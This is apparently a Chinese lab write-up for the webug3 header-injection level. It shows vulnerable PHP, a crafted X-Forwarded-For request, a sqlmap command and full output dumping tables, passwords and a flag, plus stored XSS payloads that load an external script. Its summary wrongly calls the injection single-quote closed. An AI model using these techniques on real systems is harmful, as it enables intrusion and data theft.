目录
Header头注入
本文通过《webug3靶场第五关 Header头注入》来进行SQL注入渗透实战。
1.首部注入
Header注入,该注入是指利用后端验证客户端口信息(比如常用的cookie验证)或者通过Header中获取客户端的一些信息(比如User-Agent用户代理等其他Header字段信息),因为这些信息在某些地方是会和其他信息一起存储到数据库中,然后再在前台显示出来,又因为后台没有进过相对应的信息处理所以构成了sql注入。
- HTTP 协议中的头部字段用于传递各种信息,如请求方法、请求路径、用户代理、Cookie 等。当应用程序没有对用户输入进行充分的验证和过滤时,攻击者就可以利用这一点,在头部字段中注入恶意代码或指令。例如,攻击者可能尝试注入额外的 Cookie 字段来篡改用户身份信息,或者注入自定义的头部字段来欺骗服务器执行特定的操作。
- Header的方法和位置的主要关注点在:X-Forwarded-For、User-Agent、Referer
2.x-forword-for
remote_addr:指的是当前直接请求的客户端IP地址,它存在于tcp请求体中,是http协议传输的时候自动添加,不受请求头header的控制。因此,当客户端与服务器之间不存在任何代理的时候,通过remote_addr获取客户端IP地址是最准确,也是最安全。remote_addr无法伪造
x-forwarded-for,即XFF,是很多代理服务器在请求转发时添加上去的。如果客户端和服务器之间存在代理服务器,那么通过remote_addr获取的IP就是代理服务器的地址,并不是客户端真实的IP地址。因此,需要代理服务器(通常是反向代理服务器)将真实客户端的IP地址转发给服务器,转发时客户端的真实IP地址通常就存在于XFF请求头中。
client-ip同XFF,也是代理服务器添加的用于转发客户端请求的真实IP地址,同样保存与请求头中。
第五关:一个优点小小的特殊的注入
1.打开靶场
2.源码分析
如下所示,对参数HTTP_X_FORWARDED_FOR的处理没有任何过滤,存在SQL注入漏洞
<?php
//禁用错误报告
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
require_once 'conn.php';
$query = "select * from goods ";//构建查询语句
#x-forword-for:yjs
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
echo "你改变了浏览器发送的数据,并输入了".$_SERVER['HTTP_X_FORWARDED_FOR'];
$query=$query.$_SERVER['HTTP_X_FORWARDED_FOR'];
}
$result = mysql_query($query);//执行查询
if (!$result) {
die("could not to the database\n" . mysql_error());
}
if (mysql_numrows($result)<=0) {
//恢复1条数据
$insertSql = "insert into user(gname, gprice,gnum) values('苹果', 1000,20) ";
$result = mysql_query($insertSql);
echo "<script type='text/javascript'>alert('数据被挖空,请稍候,数据恢复中~~~~!');location.href='index.php'</script>";
}else{
echo "今日水果特价,欢迎选购!"."</br>";
echo "<hr/></br>";
while($result_row=mysql_fetch_row(($result)))//取出结果并显示
{
$gname=$result_row[1];
$gprice=$result_row[2];
$gnum=$result_row[3];
echo "名称:".$gname."</br>";
echo "价格:".$gprice."</br>";
echo "数量:".$gnum."</br>";
echo "<hr/>";
}
}
关于SQL语句的调用如下所示,很明显这是针对于报文header首部的x-forword-for字段
#x-forword-for:yjs
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
echo "你改变了浏览器发送的数据,并输入了".$_SERVER['HTTP_X_FORWARDED_FOR'];
$query=$query.$_SERVER['HTTP_X_FORWARDED_FOR'];
} 3渗透实战
(1)bp抓包
将报文发送到repeater
(2)增加 x-forword-for配置
在http的首部中增加x-forwarded-for相关内容
x-forwarded-for:127.0.0.1修改bp repeater中报文的内容,并通过copy to file将其保存到文件webug3_5.txt中,如下所示
4.sqlmap渗透
(1)修改配置
在x-forwarded-for后的内容改为*,代表sqlmap注入的注入点
x-forwarded-for:*如下所示,修改后的webug3_5.txt如下所示
GET /webug3/pentest/test/1/ HTTP/1.1
Host: 192.168.71.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
x-forwarded-for:*
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1改完后效果如下
(2)注入命令
这里要注意的是需要加上--level 3,配置可以从进行首部注入,注入命令如下所示
sqlmap -r webug3_5.txt --current-db --dump --batch -level 3(3)完整交互
kali@kali:~/Desktop/liujiannan/liujiannan$ sqlmap -r webug3_5.txt --current-db --dump --batch -level 3
___
__H__
___ ___[.]_____ ___ ___ {1.5.11#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:00:07 /2022-12-01/
[21:00:07] [INFO] parsing HTTP request from 'webug3_5.txt'
[21:00:07] [DEBUG] not a valid WebScarab log data
[21:00:07] [DEBUG] cleaning up configuration parameters
[21:00:07] [DEBUG] setting the HTTP timeout
[21:00:07] [DEBUG] setting the HTTP User-Agent header
[21:00:07] [DEBUG] creating HTTP requests opener object
[21:00:07] [DEBUG] setting the HTTP Referer header to the target URL
[21:00:07] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[21:00:07] [DEBUG] used the default behavior, running in batch mode
[21:00:07] [INFO] resuming back-end DBMS 'mysql'
[21:00:07] [INFO] testing connection to the target URL
[21:00:07] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: x-forwarded-for #1* ((custom) HEADER)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: HAVING 3094=3094
Vector: HAVING [INFERENCE]
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: UNION ALL SELECT NULL,CONCAT(0x717a7a7871,0x534b564e4a6545705242414f61584d4a49706b48414d4b4d63666559474f5465754f4246556d4e48,0x71706a6b71),NULL,NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL-- -
---
[21:00:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL 5
[21:00:07] [INFO] fetching current database
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
current database: 'pentesterlab'
[21:00:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:00:07] [INFO] fetching current database
[21:00:07] [INFO] fetching tables for database: 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [INFO] fetching columns for table 'goods' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [INFO] fetching entries for table 'goods' in database 'pentesterlab'
[21:00:07] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [DEBUG] analyzing table dump for possible password hashes
Database: pentesterlab
Table: goods
[2 entries]
+----+------+-------+--------+
| id | gnum | gname | gprice |
+----+------+-------+--------+
| 1 | 20 | 苹果 | 1000 |
| 2 | 70 | 梨 | 500.09 |
+----+------+-------+--------+
[21:00:07] [INFO] table 'pentesterlab.goods' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/pentesterlab/goods.csv'
[21:00:07] [INFO] fetching columns for table 'user' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [INFO] fetching entries for table 'user' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [DEBUG] analyzing table dump for possible password hashes
Database: pentesterlab
Table: user
[2 entries]
+-----+--------+---------+-------+
| uid | pwd | bill | uname |
+-----+--------+---------+-------+
| 1 | 123456 | 50.9899 | tom |
| 2 | 123456 | 0 | admin |
+-----+--------+---------+-------+
[21:00:07] [INFO] table 'pentesterlab.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/pentesterlab/user.csv'
[21:00:07] [INFO] fetching columns for table 'comment' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [INFO] fetching entries for table 'comment' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [DEBUG] analyzing table dump for possible password hashes
Database: pentesterlab
Table: comment
[6 entries]
+----+---------------------+-------------------------------------------+
| id | time | content |
+----+---------------------+-------------------------------------------+
| 1 | 2016-10-18 07:14:13 | 1 |
| 2 | 2016-10-18 07:14:21 | 1 |
| 3 | 2016-10-18 07:22:10 | 1 |
| 4 | 2016-10-18 07:22:39 | 1 |
| 5 | 2017-01-19 01:33:57 | <script>alert(/topsec/)</script> |
| 6 | 2017-01-19 01:37:06 | <script src=http://t.cn/RM11mCJ></script> |
+----+---------------------+-------------------------------------------+
[21:00:07] [INFO] table 'pentesterlab.comment' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/pentesterlab/comment.csv'
[21:00:07] [INFO] fetching columns for table 'flag' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [INFO] fetching entries for table 'flag' in database 'pentesterlab'
[21:00:07] [DEBUG] performed 0 queries in 0.00 seconds
[21:00:07] [DEBUG] analyzing table dump for possible password hashes
[21:00:07] [INFO] recognized possible password hashes in column 'flag'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
[21:00:07] [DEBUG] used the default behavior, running in batch mode
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:00:07] [DEBUG] used the default behavior, running in batch mode
[21:00:07] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:00:07] [DEBUG] used the default behavior, running in batch mode
[21:00:07] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[21:00:07] [DEBUG] used the default behavior, running in batch mode
[21:00:07] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:00:07] [INFO] starting 4 processes
[21:00:15] [WARNING] no clear password(s) found
[21:00:15] [DEBUG] post-processing table dump
Database: pentesterlab
Table: flag
[1 entry]
+----+----------------------------------+
| id | flag |
+----+----------------------------------+
| 1 | 204f704fbbcf6acf398ffee11989b377 |
+----+----------------------------------+
总结
SQL注入主要分析几个内容
(1)闭合方式是什么?webug的第5关关卡为字符型,单引号闭合
(2)注入类别是什么?这部分是普通的header首部字符型注入
(3)是否过滤了关键字?很明显通过源码,无过滤
了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的SQL注入渗透内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
